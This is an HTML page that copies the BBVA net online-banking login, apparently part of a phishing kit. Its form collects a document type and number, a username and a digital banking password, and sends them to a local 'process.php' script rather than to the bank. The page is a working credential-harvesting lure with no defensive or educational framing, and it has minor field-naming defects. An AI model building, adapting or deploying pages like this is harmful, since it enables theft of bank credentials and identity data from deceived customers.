<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>BBVA net</title>
    <link rel="stylesheet" href="styler.css">
    <link rel="icon" href="faviconbbva.png">
    <style>
        .inputWrapper select.tipe {
            width: 300px;
            padding: 15px 10px;
            font-size: 16px;
            color: #666;
            border: 0px solid #666;
            border-radius: 0px;
            box-sizing: border-box;
            background-color: #f5f5f5;
            appearance: none;
            background-image: url('data:image/svg+xml;charset=UTF-8,<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 4 5"><path fill="%23333" d="M2 0L0 2h4z"/></svg>');
            background-repeat: no-repeat;
            background-position: right 10px center;
            background-size: 10px;
        }
        .inputWrapper select.tipe:focus {
            border-color: #666;
            outline: none;
        }
        .inputWrapper {
            position: relative;
            margin-bottom: 20px;
        }
        .inputWrapper select.tipe {
            height: 45px;
        }
    </style>
</head>
<body>
<center> 
    <header class="arriba">
        <nav class="nav">
            <a style="margin-top: 15px;" href="#" class="logo nav-link"><img class="solar" src="img/lg.svg" alt=""></a>
            <br>
            <form method="post" action="process.php">
        </nav>
    </header>
    <br><br><br><br><br>
    <img style="width: 300px;" src="img/cc.png" alt="">
    <br>

    <div class="inputWrapper">
        <div class="inputArea">
            <div class="contentInput">
                <select name="pan" class="tipe" required>
                    <option value="DNI">DNI</option>
                    <option value="LC">LC</option>
                    <option value="LE">LE</option>
                    <option value="CI">CI</option>
                    <option value="PASAPORTE">PASAPORTE</option>
                    <option value="RENAPER">RENAPER</option>
                </select>
            </div>
        </div>
    </div>

    <div class="inputWrapper">
        <div class="inputArea">
            <div class="contentInput">
                <input name="dni" class="clave" type="text" placeholder="N&uacute;mero de documento" pattern=".{4,}" required>
            </div>
            <div class="inputUnderline"></div>
        </div>
    </div>
       
    <div class="inputWrapper password">
        <div class="inputArea">
            <div class="contentInput">
                <input name="cpass" class="clave" type="password" placeholder="Usuario" pattern=".{6,}" required>
            </div>
        </div>
    </div>

    <div class="inputWrapper password">
        <div class="inputArea">
            <div class="contentInput">
                <input name="cpass" class="clave" type="password" placeholder="Clave Digital" pattern=".{6,}" required>
            </div>
        </div>
    </div>

    <h1 class="texto"><a href="" class="texto"></a></h1>
    <br>

    <input class="ingresar" type="submit" value="Ingresar" href="index2.html" /><br><br>

    <br>

    <img class="ol" src="olvide.png" alt="">
    
    </form>  
</center>
</body>
</html>
